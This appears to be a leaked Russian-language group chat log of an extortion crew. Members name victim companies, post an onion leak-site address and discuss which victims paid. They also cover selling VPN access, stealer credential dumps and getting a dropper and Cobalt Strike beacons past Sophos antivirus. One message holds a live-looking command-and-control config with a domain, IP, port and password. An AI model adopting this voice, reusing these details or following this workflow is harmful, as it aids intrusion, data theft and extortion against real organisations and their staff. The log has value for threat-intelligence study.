[2023-11-18 21:41:40] @usernamegg:matrix.bestflowers247.online: я взял за них ответсвенность
--------------------
[2023-11-18 21:41:43] @usernamegg:matrix.bestflowers247.online: надо нагрузить ребят
--------------------
[2023-11-18 21:41:54] @usernamegg:matrix.bestflowers247.online: надо решить с траффом и дроппером
--------------------
[2023-11-18 21:41:59] @usernamegg:matrix.bestflowers247.online: не в кайф впнки крутить
--------------------
[2023-11-18 21:42:02] @w:matrixtcFJHPDblmt2rg.network: да, лучше выспись
--------------------
[2023-11-18 21:42:06] @w:matrixtcFJHPDblmt2rg.network: я завтра чехлы с утра соберу
--------------------
[2023-11-18 21:42:07] @usernamegg:matrix.bestflowers247.online: хотя вот сегодня выплата пришла с впн доступа
--------------------
[2023-11-18 21:42:11] @w:matrixtcFJHPDblmt2rg.network: и подумаю как лучше сделать
--------------------
[2023-11-18 21:42:34] @w:matrixtcFJHPDblmt2rg.network: ну да, пиздец это
--------------------
[2023-11-18 21:43:02] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> не в кайф впнки крутить

та да
--------------------
[2023-11-18 21:43:06] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> хотя вот сегодня выплата пришла с впн доступа

ну да
--------------------
[2023-11-18 21:43:29] @w:matrixtcFJHPDblmt2rg.network: а с пики вообще хоть что то ожидается, там есть хоть те, которые готовы заплатить?
--------------------
[2023-11-18 21:50:52] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> а с пики вообще хоть что то ожидается, там есть хоть те, которые готовы заплатить?

пока все публикую только
--------------------
[2023-11-18 21:50:59] @usernamegg:matrix.bestflowers247.online: edc.dk
--------------------
[2023-11-18 21:51:02] @usernamegg:matrix.bestflowers247.online: были надежды
--------------------
[2023-11-18 21:51:03] @usernamegg:matrix.bestflowers247.online: но нет
--------------------
[2023-11-18 21:51:07] @usernamegg:matrix.bestflowers247.online: подсветили их
--------------------
[2023-11-18 21:51:13] @usernamegg:matrix.bestflowers247.online: maytec.de
--------------------
[2023-11-18 21:51:16] @usernamegg:matrix.bestflowers247.online: тоже подсветили
--------------------
[2023-11-18 21:51:44] @usernamegg:matrix.bestflowers247.online: http://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onion/
--------------------
[2023-11-18 21:51:46] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 21:51:47] @usernamegg:matrix.bestflowers247.online: вот тут
--------------------
[2023-11-18 21:52:01] @usernamegg:matrix.bestflowers247.online: выкладка даты через определенный срок
--------------------
[2023-11-18 21:52:15] @w:matrixtcFJHPDblmt2rg.network: подсветили?
--------------------
[2023-11-18 21:53:12] @w:matrixtcFJHPDblmt2rg.network: аа понял
--------------------
[2023-11-18 21:53:23] @w:matrixtcFJHPDblmt2rg.network: так а чего они платить то откзываются?
--------------------
[2023-11-18 21:53:29] @usernamegg:matrix.bestflowers247.online: да, сказали нам ничего не надо нам похуй мы востановились а на дату похуй
--------------------
[2023-11-18 21:53:32] @usernamegg:matrix.bestflowers247.online: это страна такая
--------------------
[2023-11-18 21:53:34] @usernamegg:matrix.bestflowers247.online: .dk
--------------------
[2023-11-18 21:53:41] @usernamegg:matrix.bestflowers247.online: muellerwaterproducts.com
--------------------
[2023-11-18 21:53:49] @usernamegg:matrix.bestflowers247.online: вот сегодня эти ребята заплатили
--------------------
[2023-11-18 21:54:31] @usernamegg:matrix.bestflowers247.online: > <@w:matrixtcFJHPDblmt2rg.network> Просто насколько я знаю, есть вроде 2 врианта почему не платят
> 1. Фибы залетают и запрещают платить
> 2. СТраховая соглашается покрывать все расходы

и да и нет, не понятно что там на самом деле ( законы еще разные во всех странах за утечку инфы
--------------------
[2023-11-18 21:54:37] @w:matrixtcFJHPDblmt2rg.network: Просто насколько я знаю, есть вроде 2 врианта почему не платят
1. Фибы залетают и запрещают платить
2. СТраховая соглашается покрывать все расходы
--------------------
[2023-11-18 21:54:45] @w:matrixtcFJHPDblmt2rg.network: аа, понял
--------------------
[2023-11-18 21:55:03] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> да, сказали нам ничего не надо нам похуй мы востановились а на дату похуй

конченые))))
--------------------
[2023-11-18 21:55:05] @usernamegg:matrix.bestflowers247.online: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
--------------------
[2023-11-18 21:55:10] @usernamegg:matrix.bestflowers247.online: https://www.youtube.com/watch?v=1Abt_Jpx2nM
--------------------
[2023-11-18 21:55:26] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 21:55:30] @usernamegg:matrix.bestflowers247.online: по этому они платят
--------------------
[2023-11-18 21:55:51] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> и да и нет, не понятно что там на самом деле ( законы еще разные во всех странах за утечку инфы

ну да, в юсе ебут за это жестко очень вообще
--------------------
[2023-11-18 21:57:35] @w:matrixtcFJHPDblmt2rg.network: ну тоже европейцы пиздец странные, по сути же не платят и подставляют работников своих, эгоисты по сути, за свои карманы что ли только беспокоятся
--------------------
[2023-11-18 21:58:26] @w:matrixtcFJHPDblmt2rg.network: cmcsheetmetal.com
--------------------
[2023-11-18 21:58:37] @usernamegg:matrix.bestflowers247.online: еще может быть знаешь что
--------------------
[2023-11-18 21:58:41] @w:matrixtcFJHPDblmt2rg.network: вот эта тоже в юсе, но видимо из-за того что маленькие не платят
--------------------
[2023-11-18 21:58:48] @w:matrixtcFJHPDblmt2rg.network: бабок нет что ли
--------------------
[2023-11-18 21:58:52] @usernamegg:matrix.bestflowers247.online: админы когда узнаю что приходил к ним пиздец
--------------------
[2023-11-18 21:59:01] @w:matrixtcFJHPDblmt2rg.network: ну или какой то из двух вариантов, что я написал
--------------------
[2023-11-18 21:59:18] @usernamegg:matrix.bestflowers247.online: они на маленьких сетях быстро все переустанавливают и востанавливают из бекапов и урководство даже не знает что у них спиздили данные
--------------------
[2023-11-18 22:00:22] @w:matrixtcFJHPDblmt2rg.network: хм
--------------------
[2023-11-18 22:00:40] @w:matrixtcFJHPDblmt2rg.network: да, есть логика в этом
--------------------
[2023-11-18 22:01:08] @w:matrixtcFJHPDblmt2rg.network: вот и не узнаешь же)
--------------------
[2023-11-18 22:01:25] @w:matrixtcFJHPDblmt2rg.network: знали бы, хотя бы могли подумать как противостоять этим действиям
--------------------
[2023-11-18 22:01:34] @w:matrixtcFJHPDblmt2rg.network: а так по сути в слепую бьем просто и все
--------------------
[2023-11-18 22:02:44] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2023-11-18 22:03:46] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2023-11-19 в 01.03.22.png
--------------------
[2023-11-18 22:03:51] @usernamegg:matrix.bestflowers247.online: все это работает ?
--------------------
[2023-11-18 22:04:09] @usernamegg:matrix.bestflowers247.online: bank что это
--------------------
[2023-11-18 22:04:16] @w:matrixtcFJHPDblmt2rg.network: задачка со звездочкой
--------------------
[2023-11-18 22:04:22] @usernamegg:matrix.bestflowers247.online: vpn как искать креды ?
--------------------
[2023-11-18 22:04:32] @usernamegg:matrix.bestflowers247.online: vpn ?
--------------------
[2023-11-18 22:04:49] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> sent an image.

да
--------------------
[2023-11-18 22:05:04] @w:matrixtcFJHPDblmt2rg.network: ну синхронизацию надо сделать
--------------------
[2023-11-18 22:05:09] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> bank что это

ну банки там есть
--------------------
[2023-11-18 22:05:13] @w:matrixtcFJHPDblmt2rg.network: из тех запросом
--------------------
[2023-11-18 22:05:15] @w:matrixtcFJHPDblmt2rg.network: * из тех запросов
--------------------
[2023-11-18 22:05:24] @w:matrixtcFJHPDblmt2rg.network: > <@usernamegg:matrix.bestflowers247.online> vpn как искать креды ?

CORP_ACCESS
--------------------
[2023-11-18 22:05:25] @w:matrixtcFJHPDblmt2rg.network: вот
--------------------
[2023-11-18 22:05:33] @w:matrixtcFJHPDblmt2rg.network: там есть 1 такой
--------------------
[2023-11-18 22:11:53] @w:matrixtcFJHPDblmt2rg.network: Банк я так понял под группу залив
--------------------
[2023-11-18 22:11:56] @w:matrixtcFJHPDblmt2rg.network: ну это для них
--------------------
[2023-11-18 22:12:04] @w:matrixtcFJHPDblmt2rg.network: помнишь ты мне скидывал запросы под банки
--------------------
[2023-11-18 22:12:07] @w:matrixtcFJHPDblmt2rg.network: вот от типа какого то
--------------------
[2023-11-18 22:12:12] @w:matrixtcFJHPDblmt2rg.network: который заливами занимается
--------------------
[2023-11-18 22:12:24] @w:matrixtcFJHPDblmt2rg.network: вот это для него по сути ифна
--------------------
[2023-11-18 22:12:27] @w:matrixtcFJHPDblmt2rg.network: инфа
--------------------
[2023-11-18 22:13:55] @w:matrixtcFJHPDblmt2rg.network: вся важная инфа от стилака будет в самом бот видна, но если надо посмотреть все пароли и autofills -> нужно нажатьб на кнопку  - FULL STEALER INFO
--------------------
[2023-11-18 22:14:04] @w:matrixtcFJHPDblmt2rg.network: и тогда в новой вкладке открывается фул инфа по стилаку
--------------------
[2023-11-18 22:19:54] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2023-11-18 22:20:08] @usernamegg:matrix.bestflowers247.online: я спать братец
--------------------
[2023-11-18 22:20:10] @usernamegg:matrix.bestflowers247.online: добрых снова
--------------------
[2023-11-18 22:20:12] @usernamegg:matrix.bestflowers247.online: до завтра
--------------------
[2023-11-18 22:20:22] @usernamegg:matrix.bestflowers247.online: завтра буду тут с 10-11 по мск
--------------------
[2023-11-18 22:20:25] @usernamegg:matrix.bestflowers247.online: выспаться хочу
--------------------
[2023-11-18 22:20:35] @usernamegg:matrix.bestflowers247.online: добрых
--------------------
[2023-11-18 22:20:47] @usernamegg:matrix.bestflowers247.online: придумай как запустить и обойти софоса
--------------------
[2023-11-18 22:20:50] @usernamegg:matrix.bestflowers247.online: будет бонус с меня
--------------------
[2023-11-18 22:21:03] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 22:21:16] @w:matrixtcFJHPDblmt2rg.network: да, давай
--------------------
[2023-11-18 22:21:16] @burito:matrix.bestflowers247.online: пробую все что в моих силах
--------------------
[2023-11-18 22:21:17] @w:matrixtcFJHPDblmt2rg.network: завтра связь
--------------------
[2023-11-18 22:21:18] @w:matrixtcFJHPDblmt2rg.network: давай
--------------------
[2023-11-18 22:21:21] @w:matrixtcFJHPDblmt2rg.network: выспись)
--------------------
[2023-11-18 22:21:26] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 22:21:30] @w:matrixtcFJHPDblmt2rg.network: ага, я тоже еще пару часиков посижу
--------------------
[2023-11-18 22:21:32] @w:matrixtcFJHPDblmt2rg.network: и где то так буду
--------------------
[2023-11-18 22:21:35] @w:matrixtcFJHPDblmt2rg.network: добрых
--------------------
[2023-11-18 22:21:38] @burito:matrix.bestflowers247.online: на дроппер вот орет по действиям, что сплоит
--------------------
[2023-11-18 22:22:14] @burito:matrix.bestflowers247.online: по действиям что коба, что дроппер, щас по шагам смотрю где палит, там может что заменю
--------------------
[2023-11-18 22:22:53] @burito:matrix.bestflowers247.online: ебнуть бы его, софос этот, да не даст же...
--------------------
[2023-11-18 22:28:15] @usernamegg:matrix.bestflowers247.online: попробуй
--------------------
[2023-11-18 22:28:19] @usernamegg:matrix.bestflowers247.online: убить
--------------------
[2023-11-18 22:28:27] @usernamegg:matrix.bestflowers247.online: я не пробовал
--------------------
[2023-11-18 23:20:36] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

а эти может тоже тестануть?
--------------------
[2023-11-18 23:21:01] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> sent a file.

и этот
--------------------
[2023-11-18 23:48:13] @burito:matrix.bestflowers247.online: стартанул оба, чекни
--------------------
[2023-11-18 23:48:17] @burito:matrix.bestflowers247.online: не спим
--------------------
[2023-11-18 23:48:36] @burito:matrix.bestflowers247.online: если нет, то вариантов пока нет....
--------------------
[2023-11-18 23:48:41] @usernamegg:matrix.bestflowers247.online: я тут
--------------------
[2023-11-18 23:50:50] @usernamegg:matrix.bestflowers247.online: оба отработали с софосом ?
--------------------
[2023-11-18 23:50:59] @usernamegg:matrix.bestflowers247.online: оба стучат нормально
--------------------
[2023-11-18 23:51:03] @usernamegg:matrix.bestflowers247.online: скинь мне эти файлы
--------------------
[2023-11-18 23:51:04] @burito:matrix.bestflowers247.online: пока не гасит, висят
--------------------
[2023-11-18 23:51:07] @usernamegg:matrix.bestflowers247.online: которыми ты позвал
--------------------
[2023-11-18 23:51:10] @usernamegg:matrix.bestflowers247.online: епать
--------------------
[2023-11-18 23:51:12] @usernamegg:matrix.bestflowers247.online: круто
--------------------
[2023-11-18 23:51:19] @burito:matrix.bestflowers247.online: да я ж в ольке их запустил)
--------------------
[2023-11-18 23:51:32] @usernamegg:matrix.bestflowers247.online: это что
--------------------
[2023-11-18 23:51:37] @burito:matrix.bestflowers247.online: дебагер
--------------------
[2023-11-18 23:51:46] @usernamegg:matrix.bestflowers247.online: пришел
--------------------
[2023-11-18 23:52:05] @burito:matrix.bestflowers247.online: из ни сделал формат для ольки и через нее стартанул
--------------------
[2023-11-18 23:52:23] @usernamegg:matrix.bestflowers247.online: но ко мне в dns
--------------------
[2023-11-18 23:52:28] @usernamegg:matrix.bestflowers247.online: сейчас тебе креды дам
--------------------
[2023-11-18 23:52:47] @usernamejj:matrix.bestflowers247.online: хорошо
--------------------
[2023-11-18 23:53:10] @usernamegg:matrix.bestflowers247.online: ```
cob_16DNS_NL
dns.monitorsystem.net
209.250.255.88
10978
uyiuaBNYUA@GabFIOmaoaPWJODHAIYUAGUYSfsgaw2@tey
```
--------------------
[2023-11-18 23:53:19] @usernamegg:matrix.bestflowers247.online: два файла отработало
--------------------
[2023-11-18 23:53:22] @usernamegg:matrix.bestflowers247.online: оба стучат
--------------------
[2023-11-18 23:53:24] @usernamegg:matrix.bestflowers247.online: днс быстрый капец
--------------------
[2023-11-18 23:53:38] @usernamegg:matrix.bestflowers247.online: круто
--------------------
[2023-11-18 23:53:49] @usernamegg:matrix.bestflowers247.online: а там бы на таргетах запускать можно было удалено
--------------------
[2023-11-18 23:53:54] @usernamegg:matrix.bestflowers247.online: и они бы приходили
--------------------
[2023-11-18 23:53:57] @usernamegg:matrix.bestflowers247.online: автоматизируй это
--------------------
[2023-11-18 23:54:02] @burito:matrix.bestflowers247.online: так пришли они?
--------------------
[2023-11-18 23:54:06] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 23:54:11] @burito:matrix.bestflowers247.online: оу))
--------------------
[2023-11-18 23:54:28] @burito:matrix.bestflowers247.online: вот и думаю как сделать
--------------------
[2023-11-18 23:54:42] @usernamegg:matrix.bestflowers247.online: pid  17596
--------------------
[2023-11-18 23:54:43] @burito:matrix.bestflowers247.online: так вручном режиме пока всё
--------------------
[2023-11-18 23:54:49] @usernamegg:matrix.bestflowers247.online: а второй сам чекинь
--------------------
[2023-11-18 23:54:56] @usernamegg:matrix.bestflowers247.online: я тут понаблюдаю чт оты деалешь
--------------------
[2023-11-18 23:55:11] @usernamegg:matrix.bestflowers247.online: как двинешься на другую тачку снимешь кребы и тд я пойду спать
--------------------
[2023-11-18 23:55:16] @usernamegg:matrix.bestflowers247.online: сейчас хешистов пропингую
--------------------
[2023-11-18 23:55:22] @usernamegg:matrix.bestflowers247.online: тут ?
--------------------
[2023-11-18 23:55:32] @usernamegg:matrix.bestflowers247.online: сейчас хеши будут
--------------------
[2023-11-18 23:55:32] @timber:matrix.bestflowers247.online: да
--------------------
[2023-11-18 23:55:39] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 23:55:47] @username777:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 23:56:12] @burito:matrix.bestflowers247.online: но щас будет инжект и он может наепнуть процессы как у кобы. в этом основной трабл
--------------------
[2023-11-18 23:56:47] @usernamegg:matrix.bestflowers247.online: странно вообще мне ничего на мои команды не отвечают эти биконы
--------------------
[2023-11-18 23:56:52] @usernamegg:matrix.bestflowers247.online: процеесы не дает
--------------------
[2023-11-18 23:57:01] @usernamegg:matrix.bestflowers247.online: ты что не спишь ?
--------------------
[2023-11-18 23:57:02] @burito:matrix.bestflowers247.online: хм
--------------------
[2023-11-18 23:57:07] @usernamegg:matrix.bestflowers247.online: странно
--------------------
[2023-11-18 23:57:12] @timber:matrix.bestflowers247.online: нет
--------------------
[2023-11-18 23:57:20] @usernamegg:matrix.bestflowers247.online: почему ?
--------------------
[2023-11-18 23:57:21] @usernameboy:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 23:57:23] @usernamegg:matrix.bestflowers247.online: дети ?
--------------------
[2023-11-18 23:57:23] @timber:matrix.bestflowers247.online: ковыряю один сайт. замучился
--------------------
[2023-11-18 23:57:28] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-11-18 23:57:41] @timber:matrix.bestflowers247.online: дети спят. золотое время, никто не отвлекает)
--------------------
[2023-11-18 23:57:48] @usernamegg:matrix.bestflowers247.online: точно
--------------------
[2023-11-18 23:57:53] @usernamegg:matrix.bestflowers247.online: я своих отправил
--------------------
[2023-11-18 23:57:56] @usernamegg:matrix.bestflowers247.online: дома один
--------------------
[2023-11-18 23:57:57] @usernamegg:matrix.bestflowers247.online: збс
--------------------
[2023-11-18 23:57:59] @usernamegg:matrix.bestflowers247.online: тишина )
--------------------
[2023-11-18 23:58:06] @timber:matrix.bestflowers247.online: уф. круто
--------------------
[2023-11-18 23:58:30] @usernamejj:matrix.bestflowers247.online: на команды почему-то не отвечает
--------------------
[2023-11-18 23:58:44] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-11-18 23:58:45] @usernamegg:matrix.bestflowers247.online: вижу
--------------------
[2023-11-18 23:58:50] @usernamegg:matrix.bestflowers247.online: на команды не отвечает
--------------------
[2023-11-18 23:59:11] @usernamegg:matrix.bestflowers247.online: бывает такое
--------------------
[2023-11-18 23:59:15] @burito:matrix.bestflowers247.online: блин
--------------------
[2023-11-18 23:59:16] @usernamegg:matrix.bestflowers247.online: раздуплит сейчас как
--------------------
[2023-11-18 23:59:32] @usernamegg:matrix.bestflowers247.online: за то у тебя есть два бикона правльные с правильным именем с этой тачки
--------------------
[2023-11-18 23:59:36] @usernamegg:matrix.bestflowers247.online: удалось позвать
--------------------
[2023-11-18 23:59:37] @usernamegg:matrix.bestflowers247.online: уркто
--------------------
[2023-11-18 23:59:40] @usernamegg:matrix.bestflowers247.online: круто
--------------------
